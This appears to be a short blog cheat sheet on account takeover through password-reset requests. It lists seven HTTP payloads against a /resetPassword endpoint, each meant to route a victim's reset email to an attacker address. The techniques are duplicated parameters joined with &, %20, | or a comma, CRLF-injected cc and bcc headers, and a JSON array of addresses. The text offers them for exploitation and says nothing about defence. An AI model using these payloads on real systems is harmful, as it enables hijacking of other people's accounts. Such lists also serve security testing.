Account Takeover: Password Reset With Manipulating Email Parameter
Exploitation
- Add attacker email as second parameter using &
1
POST /resetPassword
2
[...]
3
email=victim@email.com&email=attacker@email.com
Copied!
- Add attacker email as second parameter using %20
1
POST /resetPassword
2
[...]
3
email=victim@email.com%20email=attacker@email.com
Copied!
- Add attacker email as second parameter using |
1
POST /resetPassword
2
[...]
3
email=victim@email.com|email=attacker@email.com
Copied!
- Add attacker email as second parameter using cc
1
POST /resetPassword
2
[...]
3
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
Copied!
- Add attacker email as second parameter using bcc
1
POST /resetPassword
2
[...]
3
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
Copied!
- Add attacker email as second parameter using ,
1
POST /resetPassword
2
[...]
3
email="victim@mail.tld",email="attacker@mail.tld"
Copied!
- Add attacker email as second parameter in json array
1
POST /resetPassword
2
[...]
3
{"email":["victim@mail.tld","atracker@mail.tld"]}
Comments
Post a Comment